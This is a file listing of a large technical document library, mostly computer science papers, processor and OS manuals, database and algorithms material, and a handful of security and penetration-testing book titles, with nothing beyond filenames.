./The Data Plane Development Kit (DPDK) - What it is and where it's going - Slides.pdf
./Pandoc User's Guide.pdf
./AMD - System Programming (24593).pdf
./Introduction to Python for Computational Science and Engineering - A Beginner's Guide - September 7th, 2015.pdf
./SET_User_Manual.pdf
./Intel Advanced Encryption Standard (AES) New Instructions Set.pdf
./A Study of Wheat and Chaff in Source Code (1502.01410v1).pdf
./Hacking Exposed Network Security & Solut - JOEL SCAMBRAY_STUART MCCLURE_GEORGE KURT.pdf
./互联网企业安全高级指南.pdf
./Basics of Compiler Design - Anniversary Edition.pdf
./Screaming Fast Galois Field Arithmetic Using Intel SIMD Instructions (FAST-2013-GF).pdf
./Efficient Estimation of Word Representations in Vector Space - 2013 (1301.3781).pdf
./Down For The Count - Getting Reference Counting Back in the Ring (rc-ismm-2012).pdf
./dc-11-gentil.pdf
./Reactor - An Object Behavioral Pattern for Demultiplexing and Dispatching Handles for Synchronous Events.pdf
./Fast Deterministic Selection - Andrei Alexandrescu - June 2016 (1606.00484v1).pdf
./[web][http - the definitive guide].pdf
./信息攻防技术.pdf
./CUDA Streams - Best Practices and Common Pitfalls - Slides (2012).pdf
./Intel Pro-1000 PT Quad Port LP Server Adapter - Product Brief.pdf
./the-web-application-hackers-handbook.pdf
./Shuffler - Fast and Deployable Continuous Code Re-Randomization - 2016 (shuffler-osdi16).pdf
./Disk Based Hash Tables and Quantified Numbers (24th March, 2014).pdf
./Creating R Packages - A Tutorial (Sept 14 2009).pdf
./Simple Image File Formats - PPM Format.pdf
./Oracle 11gr1 SQL Language Reference (b28286).pdf
./IBM Fibre Channel Basic Storage Area Network (SAN) Configuration Setup Guide.pdf
./Database System Implementation - COSC 404 - Slides.pdf
./BlackHat_DC_2011_Grand-Workshop.pdf
./Elementary Calculus - An Infinitesimal Approach (keislercalc-03-07-17).pdf
./PC Assembly Language (July 23, 2006).pdf
./Managing Traffic with ALTQ.pdf
./Interval hash tree - An efficient index structure for searching object queries in large image databases (caivd99).pdf
./20070222-root-ca.pdf
./When To Use Splay Trees (2007).pdf
./Virtualization Without Direct Execution or Jitting - Designing a Portable Virtual Machine Infrastructure.pdf
./Neural Turing Machines (1410.5401v2).pdf
./20070412-install_ntop_rhel5.pdf
./20050321-RHEL_High-Availablility-solution_3.pdf
./Assembly Language for Beginners (AL4B-EN).pdf
./Broadword Implementation of Rank-Select Queries (Nov 19, 2014).pdf
./Intel 64 and IA-32 Architectures.pdf
./Safe Concurrent Programming and Execution.pdf
./Monotone Minimal Perfect Hashing - Searching a Sorted Table with O(1) Accesses - 2014 (MonotoneMinimalPerfectHashing).pdf
./From Numerical Cosmology to Efficient Bit Abstractions for the Standard Library - Vincent Reverdy - CppCon 2016.pdf
./The Memory Pool System.pdf
./Violent Python - A Cookbook for Hackers, Forensic Analysts, Penetration Testers and Security Engineers.pdf
./20050321-RHEL_High-Availablility-solution_2.pdf
./The Bw-Tree - A B-tree for New Hardware Platforms (Microsoft Research).pdf
./Spin-Based Reader-Writer Synchronization for Multiprocessor Real-Time Systems_.pdf
./Tokutek - Data Structures and Algorithms for Big Databases.pdf
./Oracle Bitmaps (2003, Sept) - [1] Understanding Bitmap Indexes (oracle-03_bitmap_1).doc
./Bash Redirections - Cheat Sheet.pdf
./The Burrows-Wheeler Algorithm - Daniel Schiller (August 5th, 2012).pdf
./Compiler Confidential - Eric Brumer (6th Sept 2013).pdf
./20051007-suse-yast.pdf
./Conflict-Free Vectorization of Associative Irregular Applications with Recent SIMD Architectural Advances - Feb 2018 (cgo18).pdf
./InK-Compact- In-Kernel Stream Compaction and Its Application to Multi-Kernel Data Visualization on General-Purpose GPUs - 2013.pdf
./Inside The Deal That Made Bill Gates 350,000,000 (1986).pdf
./Locks, Deadlocks and Synchronization - Windows Hardware and Driver Central (2006).pdf.docx
./Metasploit-The Penetration Tester s Guide.pdf
./Windows Network Services Internals - Hivercon 2003 (Jean-Baptiste Marchand).pdf
./An Introduction To Statistical Learning with Applications in R (ISLR Sixth Printing).pdf
./Web_Services_Hacking_and_Hardening.pdf
./Gunrock - A High-Performance Graph Processing Library on the GPU - 2016.pdf
./Heapy - A Memory Profiler and Debugger for Python - 2006 (heapy-thesis).pdf
./Weird Things that Surprise Academics Trying to Commercialize a Static Checking Tool (spin05-coverity).pdf
./Data Compression Techniques - Lecture 2 - Morse Code to Huffman Coding - University of Helsinky - Slides (2015).pdf
./A Crash Course in x86 Assembly for Reverse Engineers - SensePost (2014).pdf
./Linux-101-Hacks.pdf
./x86 Intrinsics Cheatsheet v2.1.pdf
./Cache, Hash and Space-Efficient Bloom Filters.pdf
./UNIX Time Sharing System - UNIX Programmer's Manual - Seventh Edition, Volume 2A - January, 1979 (v7vol2a).pdf
./Alpha AXP Architecture - 1992 (vol4num4art1).pdf
./How To Code In HTML5 And CSS3 - Damian Wielgosik.pdf
./Lynx - Using OS and Hardware Support for Fast Fine-Grained Inter-Core Communication (mitropoulou16-ics).pdf
./The Dataflow Model - A Practical Approach to Balancing Correctness, Latency, and Cost in Massive-Scale, Unbounded, Out-of-Order Data Processing (p1792-Akidau).pdf
./Massively-Parallel Similarity Join, Edge-Isoperimetry, and Distance Correlations on the Hypercube - 15th Nov 2016 (1611.04999).pdf
./5-Level Paging and 5-Level EPT - Intel - Revision 1.1 (May, 2017).pdf
./C++14 - Working Draft (N3797).pdf
./Proof of Concept or GTFO - v17 (30th December, 2017).pdf
./Pattern Matching using Suffix Trays, Arrays and Trees (2014).pdf
./Linux Kernel Architecture for Device Drivers (Thomas Petazzoni).pdf
./Python Pocket Reference, 5th Edition.pdf
./Massively Parallel Sort-Merge Joins in Main Memory Multi-Core Database Systems - 2012 (p1064_martina-cezaraalbutiu_vldb2012).pdf
./A File is Not a File - Understanding IO Behavior of Apple Desktop Applications (2011).pdf
./Learning Python.pdf
./Finding Frequent Items in Data Streams - PLVDB - 2008.pdf
./20051007-suse-mail.pdf
./Programming Satan's Computer (AndersonNeedham).pdf
./Beyond Block IO - Rethinking Traditional Storage Primitives (ouyangx-hpca2011-slides).pdf
./Hardware Transactional Memory on Haswell.pdf
./Agner Fog - Optimizing Software in C++ (2014-08-07).pdf
./Oracle Bitmaps (1999, Jan) - Make a Little Bit Go a Long Way (oracle-01_bitmap_1).doc
./The R Inferno (30th April, 2011).pdf
./Lightweight Contention Management for Efficient Compare-and-Swap Operations.pdf
./20060310-linux_php_photo.pdf
./libtorque - Portable Multithreaded Continuations for Scalable Event-Driven Programs.pdf
./Consistently Faster and Smaller Compressed Bitmaps with Roaring - 19th April, 2016 (1603.06549).pdf
./Retroactive Data Structures (2012).pdf
./Visual Studio, Microsoft Portable Executable and Common Object File Format Specification - Revision 9.3 - 29th Dec, 2015 (pecoff_v93).pdf
./Futexes Are Tricky - Ulrich Drepper (2011).pdf
./HDF5 - Taming Parallel IO Complexity with Auto-Tuning (P4091-0713_2).pdf
./Broadword Implementation of Parenthesis Queries.pdf
./An Introduction to CUDA-OpenCL and Graphics Processors (CS267-GPUs-2014).pptx
./Windows Kernel Internals - NT Registry Implementation.pdf
./pre-print-oopsla16.pdf
./20060124-mysql4.1.pdf
./A+Beginners+Guide+To+Hacking+Computer+Systems.zip
./FPGA Acceleration by Dynamically-Loaded Hardware Libraries - 2016 (tr16_03_Nannarelli_A).pdf
./Making networking apps scream on Windows with DPDK.pdf
./A New Basis for Shifters in General-Purpose Processors for Existing and Advanced Bit Manipulations - 2009 (IEEE_TC09_NewBasisForShifters).pdf
./Theory and Practice of Monotone Minimal Perfect Hashing.pdf
./Calculus Refresher, Version 2008.4 (Paul Garrett).pdf
./Practical Data Compression for Modern Memory Hierarchies - July 2016 - CMU-CS-16-116 (1609.02067).pdf
./GOD16-JavaDeserialization.pdf
./11.掌握阿里云监控/掌握阿里云监控-1.mp4
./11.掌握阿里云监控/实验.txt
./11.掌握阿里云监控/云服务ECS监控项参考.pdf
./Index Compression - Slides.pdf
./Fast CRC Computation for Generic Polynomials Using PCLMULQDQ Instruction - Intel (December, 2009).pdf
./CUDA C and C++ Streams and Concurrency - NVIDIA - Slides.pdf
./Putting Coroutines to Work with the Windows Runtime - Kenny Kerr and James McNellis - CppCon 2016.pdf
./The Saddest Moment.pdf
./Unreliable Guide to Hacking the Linux Kernel (2000).pdf
./Perfect Hash Functions - Slides.pdf
./The Influence of Organizational Structure On Software Quality - An Empirical Case Study (tr-2008-11).pdf
./Modern C.pdf
./Encyclopedia of Controller Fundamentals and Features - Firmware Version 3.2 to 8.0 (8_0_775041-01C).pdf
./FastBDT - A speed-optimized and cache-friendly implementation of stochastic gradient-boosted decision trees for multivariate classification - 2016 (1609.06119v1).pdf
./The Significance of SIMD, SSE and AVX - Intel - Slides (3a_SIMD).pdf
./A Relational Model of Data for Large Shared Data Banks - E.F. Codd (1970).pdf
./IMP - Indirect Memory Prefetcher - MIT (2015).pdf
./The Vertica Analytic Database- C-Store 7 Years Later (p1790_andrewlamb_vldb2012).pdf
./A Little Journey Inside Windows Memory.pdf
./Gray Hat Python.pdf
./Intel Architecture Instruction Set Extensions Programming Reference - Oct 2014 (319433-022).pdf
./20130521-build_pc_cluster_using_drbl_in_centos_6.3.pdf
./The RFB Protocol (v3.0, 26-Nov-2010).pdf
./TruRank - Taking PageRank to the Limit.pdf
./20070309-ldap-7.pdf
./Integer Encoding - Chapter 9 (2013).pdf
./Internet+Advanced+Denial+of+Service+(DDOS)+Attack.zip
./The IBM POWER8 Review - Challenging the Intel Xeon - Anandtech (2015).pdf
./X-Ray - A Function Call Tracing System.pdf
./COZ - Finding Code that Counts with Causal Profiling - 2015 (UM-CS-2015-008).pdf
./Experiences in the Land of Virtual Abstractions - Slides - 2014 (VEE14-present601).pdf
./User Mode Memory Page Management.pdf
./bash.pdf
./BIOS and Kernel Developer's Guide for AMD Athlon 64 and AMD Opteron Processors - r3.30 Feb 2006.pdf
./New Cardinality Estimation Algorithms for HyperLogLog Sketches (1702.01284).pdf
./Polynomial-Time Perfect Matchings in Dense Hypergraphs - 2013 (stoc212fp-keevash).pdf
./Maintaining Knowledge about Temporal Intervals - 1983.pdf
./Introduction to Parallel Architectures - Josep Torrellas - CS533 (2012).pdf
./Windows NT pagefile.sys Virtual Memory Analysis.pdf
./课件3门--樊山.zip
./Jump the Queue to Lower Latency - USENIX - April 2015 (login_apr15_02_grosvenor_041315).pdf
./Automatically Proving Termination and Memory Safety for Programs with Pointer Arithmetic - Microsoft Research (2016).pdf
./Tokutek - Solving the Challenges of Big Databases with MySQL (MySQL Connect 2012).pdf
./Information Retrieval - Compression, Encoding - Slides - Cornell (2013).pdf
./Program Synthesis By Sketching (EECS-2008-177).pdf
./Self-stabilizing Systems in Spite of Distributed Control - ACM - 1974 - (EWD426).PDF
./Google's Neural Machine Translation System - Bridging the Gap between Human and Machine Translation - 2016 (1609.08144v1).pdf
./Colfax Optimization Techniques for the Intel MIC Architecture - Part 3 of 3 - False Sharing and Padding (2015).pdf
./Traps and Pitfalls of Topic-Biased PageRank.pdf
./BPF - In-memory Virtual Machine (bpf_collabsummit_2015feb20).pdf
./Mihai Patrascu - Obituary and Open Problems.pdf
./Hoard - A Scalable Memory Allocator for Multithreaded Applications (berger-asplos2000).pdf
./BitPath - Label Order Constrained Reachability Queries over Large Graphs - 1203.2886 (13th March, 2012).pdf
./Exploring PLSQL New Features Best Practices - OOW 2013 Aharonovich.pdf
./20070723-linux_network_security.pdf
./Dijkstra's in Disguise - Eric Jang (12th August, 2018).pdf
./ZAPGettingStartedGuide-2.7.pdf
./20051130-Linux-scanner.pdf
./Oracle - Multitenant Databases (Arup Nanda).pdf
./20081205-rhel5-iscsi.pdf
./How fast can we make interpreted Python - NYU (2012).pdf
./Hashcash - A Denial of Service Counter-Measure (1st August, 2002).pdf
./20070222-iis-ssl.pdf
./Introduction to Random Graphs - Frieze and Karonski (Book).pdf
./PLPython - Python inside the PostgreSQL RDBMS (Slides, EuroPython 2011).pdf
./Logistic Regression.pdf
./Engineering Better Software at Microsoft - Jason Yang, Slides - 30th Nov 2011 (25-sal).pdf
./Analyzing Runtime and Size Complexity of Integer Programs - Microsoft Research (2016).pdf
./信息安全标准发展历程.mm
./Learning Statistics with R (lsr-0.5).pdf
./Compiler Design In C.pdf
./On the k-Independence Required by Linear Probing and Minwise Independece - December 25th, 2014 (1302.5127).pdf
./Deny Capabilities for Safe, Fast Actors - Ponylang (2015).pdf
./Hacking_ Beginner to Expert Guide.pdf
./Fast Databases with Fast Durability and Recovery Through Multicore Parallelism (osdi14-paper-zheng_wenting).pdf
./20070227-ldap-6.pdf
./Improving the speed of neural networks on CPUs (37631).pdf
./EIT - The Internal Extent Formula for Compacted Tries.pdf
./Goals Gone Wild - The Systematic Side Effects of Over-Prescribing Goal Setting - Harvard Business School (09-083).pdf
./Distributed and Parallel Time Series Feature Extraction for Industrial Big Data Applications - 25th October 2016 (1610.07717v1).pdf
./Intel Architecture Instruction Set Extensions Programming Reference (319433-017).pdf
./Automated Instruction Stream Throughput Prediction for Intel and AMD Microarchitectures - 2018 (1809.00912).pdf
./Evaluation of Contemporary Graph Databases for Efficient Persistence of Large-Scale Models.pdf
./Windows Kernel Internals - Lightweight Procedure Calls.pdf
./Windows - A Software Engineering Odyssey (Lucovsky).pdf
./HELIX-RC - An Architecture-Compiler Co-Design for Automatic Parallelization of Irregular Programs (campanoni14-isca).pdf
./Intel - _vectorcall and __regcall Demystified.pdf
./Finding Similar Items.pdf
./20050926-Linux_Installation_Server_in_WinXP.pdf
./Chihuahua - A Concurrent, Moving, Garbage Collector using Transactional Memory - 2015 (anderson-transact-2015).pdf
./Hacking The Next Generation.pdf
./Agner Fog - Calling Conventions for different C++ compilers and operating systems (2017-05-01).pdf
./UNIX IO and its Slouch Towards Multicore NUMA (libtorque).pdf
./Towards End-to-End Speech Recognition with Recurrent Neural Networks (graves14).pdf
./Introspection for C and its Applications to Library Robustness - 2017 (1712.01163).pdf
./Thirty-three Miniatures - Mathematical and Algorithmic Applications of Linear Algebra - 2017 (stml-53-matousek-1).pdf
./On the Quest for an Acyclic Graph - 9th Oct, 2017 (1708.01745).pdf
./Adaptive Ray Packet Reordering - 2008 (reorder_rt08).pdf
./A Mathematician's Lament - Paul Lockhart.pdf
./NTFS System Crash - Marius Tivadar - July 19th, 2017.pdf
./信息安全技术.doc
./Speeding up Networking - Precision IO.pdf
./Intel 64 and IA-32 Architectures Software Developer's Manual - Documentation Changes - June 2016 (252046-051).pdf
./Reducing Cache Pollution Through Detection and Elimination of Non-Temporal Memory Accesses - 2010 (pap368s4).pdf
./Principles of Computer System Design - An Introduction - Part II - Version 5.0 (part_ii_open_5_0).pdf
./Scriptable Operating Systems with Lua.pdf
./A Truly Concurrent Semantics for the K Framework Based on Graph Transformations - Slides (serbanuta-rosu-2012-icgt-slides).pdf
./20060726-why-connect-with-ssl.pdf
./A Faster Cutting Plane Method and its Implications for Combinatorial and Convex Optimization - MIT - 2015 (1508.04874).pdf
./The Web Application Hackers Handbook.pdf
./Windows Filter Manager - Slides (2003).pdf
./The Ubiquitous B-Tree - 1979 (comer-b-tree).pdf
./re.pdf
./Exploiting SIMD for Complex Numerical Predicates - 2015 (HardBD16_3).pdf
./Pool Tag Quick Scanning for Windows Memory Analysis - 2016.pdf
./Memory Ordering in Modern Microprocessors (ordering.2007.09.19a).pdf
./Cluster-based Mixed Coding Schemes for Inverted File Index Compression (v6i10a4).pdf
./Rewriting x86 Binaries without Code Producer Cooperation (wartell12thesis).pdf
./BGP in 2013 (and a bit of 2014) - Slides (156-2014-05-12-bgp2013).pdf
./QuickThread - Comparison between QuickThread and OpenMP 3.0 under system loads (2009).pdf
./Brief Calculus - Benjamin Crowell  - Nov 10th, 2015.pdf
./Burrows-Wheeler Transform and FM Index - Slides (Ben Langmead, Johns Hopkins).pdf
./Pin Tutorial - Slides (2007).pdf
./Intel 64 and IA-32 Architectures Software Developer's Manual - Combined Volumes 1-3 - Sept 2014 (325462-052US).pdf
./WinDbg Cheat Sheet.pdf
./Fast Parallel Suffix Array on the GPU.pdf
./Intel Architecture Instruction Set Extensions Programming Reference - Sep 2016 (319433-025).pdf
./Data Compression Techniques - Lecture 3 - Integer Codes 1 - University of Helsinky - Slides (DCT2015-Lecture3Web).pdf
./Things You Didn't Known About Portable Executable File Format (PECOFF) - Slides - 2011 (BH_US_11_VuksanPericin_PECOFF_Slides).pdf
./Intel Multimedia Instructions (MMX, SSE, SSE2, SSE3 and SSE4) - Slides.pdf
./Hash and Displace - Efficient Evaluation of Minimum Perfect Hash Functions - 1999 (10.1.1.148.7694).pdf
./COZ - Finding Code that Counts with Causal Profiling - 2015 (090-curtsinger).pdf
./Applying the Proactor Pattern to High-Performance Web Servers.pdf
./The Basics of Hacking and Penetration Testing, Second Edition.pdf
./Modern Microprocessors - A 90 Minute Guide.pdf
./Fully Concurrent Garbage Collection of Actors on Many-Core Machines - 2013 (opsla237-clebsch).pdf
./How TokuDB Fractal Tree Databases Work Presentation.pdf
./Uninformed v4a1 - Improving Automated Analysis of Windows x64 Binaries (2006).pdf
./Multi-core with less pain - Deterministic Parallel Programming with Haskell.pdf
./ARIES - A Transaction Recovery Method Supporting Fine-Granularity Locking and Partial Rollbacks Using Write-Ahead Logging (1992).pdf
./TCP Fast Open.pdf
./Dissecting the NVIDIA Volta GPU Architecture via Microbenchmarking - 2018 - Slides (1804.06826).pdf
./Using non-volatile memory (NVDIMM-N) as byte-addressable storage in Windows Server 2016 (P470).pptx
./Post-exploitation.pdf
./Developing and Porting Applications to AIX (sg245674).pdf
./Nobody ever got fired for using Hadoop on a Cluster - Microsoft 2012 (hotcbp12).pdf
./Image and Video Processing - Binary Encoding and Quantization (2016).pdf
./Fast and Scalable Minimal Perfect Hashing for Massive Key Sets - 2017 (1702.03154).pdf
./Quasi-Succinct Indices (2012).pdf
./Filter Manager - Windows.pdf
./Overview of RDMA on Windows.pdf
./防火墙原理及应用-苗春羽.pdf
./Joint Strike Fighter Air Vehicle C++ Coding Standards - Dec 2005 (Doc. 2RDU00001 Rev. C).pdf
./CISP-PTE2018.pdf
./Basic Linux Privilege Escalation.pdf
./18229-white-paper--post-exploitation-using-meterpreter.pdf
./20050727_www-on-RHEL4.pdf
./A History of Modern 64-bit Computing - Feb 2007 (CSEP590A).pdf
./Microsoft Portable Executable and Common Object File Format Specification - Revision 8.3 (6th Feb, 2013).docx
./A Survey of Rollback-Recovery Protocols in Message-Passing Systems (10.1.1.52.4299).pdf
./Generalized Histogram Algorithms for CUDA GPUs - Slides - 2012 (histogram_para2012).pdf
./Undocumented PECOFF (BH_US_11_VuksanPericin_PECOFF_WP).pdf
./欺骗的艺术 凯文.米特尼克.pdf
./ARM - Instruction Set Quick Reference Card (QRC0001_UAL.)pdf.pdf
./One Billion Word Benchmark for Measuring Progress in Statistical Language Modeling (1312.3005v3).pdf
./Parallel Scans and Prefix Sums - Slides (2013).pdf
./Performance and Reliability Analysis Using Directed Acyclic Graphs - 1987 (10.1.1.380.4352).pdf
./Statistically adaptive learning for a general class of cost functions (SA L-BFGS) (1209.0029v3).pdf
./HexRaysCodeXplorer - Making Object-Oriented RE Easier - Slides (2013).pdf
./Regular and Almost Universal Hashing - An Efficient Implementation - 2016 (1609.09840).pdf
./How to Benchmark Code Execution Times on Intel IA-32 and IA-64 Instruction Set Architectures - September, 2010 (324264-001).pdf
./Best Practices for Vectorization - Getting Ready for Intel AVX-512 (2015).pdf
./The Notorious Four-Color Problem.pdf
./CK-12 Probability and Statistics Advanced - Second Edition.pdf
./Hardware Hacking - Have fun while voiding your warranty.pdf
./The Holy Book of X86 v2.pdf
./Fast Parallel GPU-Sorting Using a Hybrid Sort.pdf
./A Practical Guide to Support Vector Classification.pdf
./Perfect Matchings in Large Uniform Hypergraphs with Large Minimum Collective Degree (2008).pdf
./MSDN - Multithreading for Rookies (September 24, 1993).pdf
./Ideal Hash Trees - Phil Bagwell - ACM.pdf
./20060705-openwebmail-ssl.pdf
./20050117-SubversionSystem.pdf
./Windows Error Codes.pdf
./ASLR on the Line - Practical Cache Attacks on the MMU - 2017 (anc_ndss17).pdf
./37 Million Compilations - Investigating Novice Programming Mistakes in Large-Scale Student Data (fp1187-altadmri).pdf
./Tries and Suffix Tries - Slides (Ben Langmead, Johns Hopkins).pdf
./Index Compression - Slides (2011).pdf
./AMD64 Architecture Programmer's Manual - Volume 3 - General-Purpose and System Instructions (24594, r3.25, Dec-2017).pdf
./Blade - A Data Center Garbage Collector - 2015 (1504.02578).pdf
./Oracle - Partitioning Tips and Tricks (Arup Nanda).pdf
./Attacking the Windows Kernel - 2007.pdf
./Coq - The World's Best Macro Assembler.pdf
./Can't Get To Performing Without Storming (pat-ma03).pdf
./Fast Bit Compression and Expansion with Parallel Extract and Parallel Deposit Instructions - 2006 (hilewitz06).pdf
./20090427-learn_sed_and_awk.pdf
./Build Systems a la Carte - 2018 (build-systems-5ab0f42d0f937).pdf
./Bitmap Index Design and Evaluation - 1998 (P355).pdf
./Windows User-Mode Drivers - Alex Ionescu (2012).pdf
./Intel Xeon Phi - System Software Developers Guide (Nov 2012).pdf
./HackersSecrets.pdf
./SIMD at Insomniac Games (How We Do The Shuffle) - Slides - 2015.pdf
./A NUMA API for Linux - Novell (2005).pdf
./Mastering the Game of Go with Deep Neural Networks and Tree Search.pdf
./Instant Loading for Main Memory Databases - 2013 (p1702-muehlbauer).pdf
./Data Transfer Matters for GPU Computing - 2013 (icpads13).pdf
./Bitmap Indexing and Related Techniques - Slides.pdf
./鸟哥私房菜(linux基础篇).pdf
./Hash, Displace, and Compress (esa09).pdf
./Intel IO Acceleration Technology Overview (2006).pdf
./B-trees, Shadowing, and Clones (2007).pdf
./Specialising Dynamic Techniques For Implementing The Ruby Programming Language.pdf
./Why BitBlt was So Successful - SIGGRAPH 84 (pike84bitblt).pdf
./GPU-ArraySort - A parallel, in-place algorithm for sorting large number of arrays (2016).pdf
./High-performance Concurrency Control Mechanisms for Main-memory Databases (p298_per-akelarson_vldb2012).pdf
./Hyperparameter Optimization using Hyperopt - Slides (2016).pdf
./RTFM Red Team Field Manual.pdf
./20060216-linux_backup.pdf
./Understanding the Performance of PCI Express Systems - Xilinx (October, 2014).pdf
./阿里云/01.如何成为云上原住民/1.如何成为云上原住民.mp4
./阿里云/00.阿里云云计算专业认证(ACP级)考试认证流程/阿里云云计算专业认证(ACP级)考试认证流程.pdf
./阿里云/00.阿里云云计算专业认证(ACP级)考试认证流程/阿里云云计算专业认证-考试大纲.pdf
./Kerncraft - A Tool for Analytic Performance Modeling of Loop Kernels - 2018 (1702.04653).pdf
./Lockless Programming - GDC 2009 - Slides (Bruce Dawson).pdf
./Programming Interfaces to Non-Volatile Memory - Slides.pdf
./Prefix B-trees - 1977.pdf
./blindsql.pdf
./Blogel - A Block-Centric Framework for Distributed Computation on Real-World Graphs (2014).pdf
./Peering Inside the PE - A Tour of the Win32 Portable Executable File Format - MSDN (1994).pdf
./Topics in IRIX 6.5 Programming.pdf
./HTTP as the Narrow Waist of the Future Internet.pdf
./Bitcoin - A Peer-to-Peer Electronic Cash System.pdf
./Comdb2 - Bloomberg's Highly Available Relational Database System - 2017 (p1377-scotti).pdf
./Opportunistic Data Structures with Applications (2000).pdf
./LSM-trie - An LSM-tree-based Ultra-Large Key-Value Store for Small Data (wu15-lsm-trie).pdf
./Replacing Suffix Trees with Enhanced Suffix Arrays (2004).pdf
./The NumPy Array - A Structure for Efficient Numerical Computation (2011).pdf
./A Dive in to Hyper-V Architecture and Vulnerabilities.pdf
./Accelerating Network Receive Processing - Intel IO Acceleration Technology (ols2005v1-pages-289-296).pdf
./Test-driving Intel Xeon Phi - 2013 (p137).pdf
./A Block-sorting Lossless Data Compression Algorithm - May 10th, 1994 (SRC-RR-124).pdf
./Binarized Neural Networks - Training Deep Neural Networks with Weights and Activations Constrained to +1 or -1 - 2016 (1602.02830v3).pdf
./A First Encounter with Machine Learning - 2011 (IntroMLBook).pdf
./New sendfile(2) - FreeBSD (20 Feb 2015).pdf
./The Little Book of Semaphores - Version 2.1.5 (downey08semaphores).pdf
./FERRARI - Flexible and Efficient Reachability Range Assignment for Graph Indexing.pdf
./The Hacker Playbook 2 - Practical Guide To Penetration Testing.pdf
./Tru64 - Programmer's Guide (ARH9VDTE).PDF
./Witnesses for Non-Satisfiability of Dense Random 3CNF Formulas (May 9th, 2006).pdf
./Universal and Perfect Hashing (lect1004).pdf
./20050801_SELinux.pdf
./Agner Fog - Instruction Tables (2018-04-09).pdf
./The Query-flow Graph - Model and Applications (2008).pdf
./Hacking Exposed Sixth Edition Network Security Secrets and Solutions.pdf
./The NT Insider (2017-01).pdf
./Intel Carry-Less Multiplication Instruction and its Usage for Computing the GCM Mode - Revision 2.0 (323640-001, May 2010).pdf
./The C and C++ Memory Model.pdf
./Parallel Lossless Data Compression on the GPU.pdf
./Intel AVX-512 Instructions and Their Use in the Implementation of Math Functions - Slides (s1-cornea).pdf
./Verification Techniques.pdf
./Efficient Computation of Binomial Coefficients Using Splay Trees - 2016 (10.11648.j.ijdst.20160201.14).pdf
./xss_security_days.pdf
./Linear Road - A Stream Data Management Benchmark (2004).pdf
./Critique of Microkernel Architectures (Slides).pdf
./The Holy Book of X86 v1.pdf
./Writing a Simple Operating System from Scratch - Nick Blundell - Dec 2010.pdf
./More Than You Ever Wanted to Know about Synchronization - Synchrobench, Measuring the Impact of the Synchronization on Concurrent Algorithms - 2015 (gramoli-synchrobench).pdf
./A Scalable Concurrent malloc Implementation for FreeBSD (jemalloc).pdf
./Advanced Bloom Filter Based Algorithms for Efficient Approximate Data De-Duplication in Streams - 17th Dec 2012 (1212.3964v1).pdf
./The Transactional Memory - Garbage Collection Analogy (analogy_oopsla07).pdf
./Detours - Binary Interception of Win32 Functions - 1999 (huntusenixnt99).pdf
./Python Penetration Testing Essentials.pdf
./Compiler Confidential - Eric Brumer (6th Sept 2013).pptx
./Computer+Viruses,+Hacking+and+Malware+attacks+for+Dummies.zip
./Time, Clocks, and the Ordering of Events in a Distributed System - Leslie Lamport, 1978 (p558-lamport).pdf
./In-memory Columnar Store for PostgreSQL (322_IMCS).pdf
./NVDIMM Namespace Specification - Intel (Revision 1.0, April 2015).pdf
./SMT and Z3 - Microsoft Research - Slides (2009).pdf
./Fast Search in Hamming Space with Multi-Index Hashing.pdf
./Intel PCI Express Ethernet Networking - White Paper - Sept 2005.pdf
./How To Write Shared Libraries - v4.1.2 (Drepper, 2001).pdf
./Internet+Security+Technology+and+Hacking.zip
./2015-11-17-Linux_daemons.pdf
./Compiler Calling Conventions.pdf
./Penetration Testing with Kali Linux (2014).pdf
./Windows Kernel Attacks through User-Mode Callbacks (Black Hat USA 2011).pdf
./TensorFlow - Large-Scale Machine Learning on Heterogeneous Distributed Systems (Nov 9th, 2015).pdf
./High Throughput Heavy Hitter Aggregation for Modern SIMD Processors (damon13).pdf
./BlackHat_DC_2011_Gates_Attacking-Oracle-Web-Slides.pdf
./Seminars - A Collection of Materials on Seminar Approaches and Evaluation Strategies.pdf
./A Durable Main-Memory Index Using Flash.pdf
./Agner Fog - Optimizing Subroutines in Assembly Language - An optimization guide to x86 platforms (2017-05-01).pdf
./20070222-ldap-5.pdf
./Providing Safe, User Space Access to Fast, Solid State Disks (2012).pdf
./An Evaluation of Network Stack Parallelization Strategies in Modern Operating Systems.pdf
./A Wavelet Tree Based FM-Index for Biological Sequences in SeqAn (January 30, 2012).pdf
./kali-linux-web-pentest-cookbook.pdf
./Ring 0 to Ring-1 Attacks - Hyper-V IPC Internals - Alex Ionescu (syscan2015).pdf
./AMD - GCN3 Instruction Set Architecture - Graphics Core Next Architecture, Generation 3 (Revision 1.0, March 2015).pdf
./Learning a Hidden Hypergraph - 2006 (angluin06a).pdf
./9781783989522-MASTERING_WIRESHARK.pdf
./Alternating Coding and its Decoder Architectures for Unary-Prefixed Codes - PhD Thesis, Shang Xue (2005).pdf
./Solaris 10 System Administration Guide - Solaris Fibre Channel Storage Configuration and Multipathing Support Guide.pdf
./Fast Multiple String Matching Using Streaming SIMD Extensions Technology - 2013 (psc13p08_presentation).pdf
./Inside IOCP.pdf
./bh-asia-02-lsd.pdf
./Item-Based Collaborative Filtering Recommendation Algorithms.pdf
./Microsoft Windows - Software Development Kit - Programmer's Learning Guide - Version 2.0 (1987).pdf
./Intel AVX-512 Architecture - Poster - 2013 (Demikhovsky-Poster).pdf
./Network Stack Specialization for Performance - 2013 (hotnets-final43).pdf
./ObCaptureObjectName.pdf
./Analyzing Contextual Bias of Program Execution on Modern CPUs (Lars Kirkholt Melhus, NTNU, June 2013).pdf
./Mathematics for Computer Science (2012).pdf
./Egocentrism Over E-Mail - Can We Communicate as Well as We Think (krugeretal05).pdf
./CUDA_practice.pdf
./Debugging Tools for Windows (WinDbg, KD, CDB, NTSD).pdf
./Microsoft Windows RPC Security Vulnerabilities.pptx
./NVIDIA - GeForce GTX 1080 - Whitepaper.pdf
./Writing Linux Device Drivers in Assembly Language - 2002.pdf
./M4 - A Visualization-Oriented Time Series Data Aggregation (p797-jugel).pdf
./Intel Compiler Optimization and Building for KNL - Slides (2016).pdf
./Partial Redundancy Elimination for Global Value Numbering.pdf
./Linux Block IO - Introducing Multi-queue SSD Access on Multicore Systems.pdf
./Oracle PLSQL in 12c (Arup Nanda).pdf
./P - Safe Asynchronous Event-Driven Programming - Microsoft Research Labs - November 2012 (tr-8).pdf
./Windows Kernel Internals - Synchronization.pdf
./20080612-RHCA-introduction.pdf
./Oracle 11gr2 Object-Relational Developer's Guide (e11822).pdf
./20060328-linux_ipod.pdf
./Linear Algebra Abridged - Sheldon Axler (13th March, 2016).pdf
./Porting Linux to a New Processor Architecture (elc-2016).pdf
./TCIPIP.pdf
